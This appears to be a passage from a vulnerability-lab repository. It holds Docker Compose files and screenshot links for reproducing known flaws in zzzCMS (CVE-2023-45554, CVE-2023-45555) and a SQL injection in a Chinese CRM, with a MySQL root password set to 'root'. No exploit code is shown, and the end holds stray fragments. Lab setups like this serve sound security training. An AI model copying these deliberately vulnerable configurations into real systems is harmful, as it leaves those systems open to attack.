https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/zzzCMS/CVE-2023-45554/9.png
--------------------------------------------------------------------------------
/zzzCMS/CVE-2023-45554/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | php_web:
4 | image: shelter2024/zzzcms-v2.1.7-web
5 | container_name: zzzcms-v2.1.7-web
6 | depends_on:
7 | - mysql
8 | ports:
9 | - "80:80"
10 | mysql:
11 | image: mysql:5.7
12 | container_name: zzzcms-v2.1.7-web-mysql
13 | environment:
14 | - MYSQL_ROOT_PASSWORD=root
15 | - MYSQL_DATABASE=zzzcms
16 |
--------------------------------------------------------------------------------
/zzzCMS/CVE-2023-45555/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/zzzCMS/CVE-2023-45555/1.png
--------------------------------------------------------------------------------
/zzzCMS/CVE-2023-45555/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/zzzCMS/CVE-2023-45555/2.png
--------------------------------------------------------------------------------
/帮管客CRM/帮管客 CRM jiliyu SQL注入漏洞/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/帮管客CRM/帮管客 CRM jiliyu SQL注入漏洞/1.png
--------------------------------------------------------------------------------
/帮管客CRM/帮管客 CRM jiliyu SQL注入漏洞/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/帮管客CRM/帮管客 CRM jiliyu SQL注入漏洞/2.png
--------------------------------------------------------------------------------
/帮管客CRM/帮管客 CRM jiliyu SQL注入漏洞/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/帮管客CRM/帮管客 CRM jiliyu SQL注入漏洞/3.png
--------------------------------------------------------------------------------
/帮管客CRM/帮管客 CRM jiliyu SQL注入漏洞/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | php_web:
4 | image: shelter2024/bgjcrm-v5.1.2-web
5 | container_name: BGJCRM5-v5.1.2-web
6 | depends_on:
7 | - mysql
8 | ports:
9 | - "80:80"
10 | mysql:
11 | image: mysql:5.7
12 | container_name: BGJCRM5-v5.1.2-web-mysql
13 | environment:
14 | - MYSQL_ROOT_PASSWORD=root
15 |
16 |
--------------------------------------------------------------------------------
ttyghxqnana
6 |
7 | 
315415433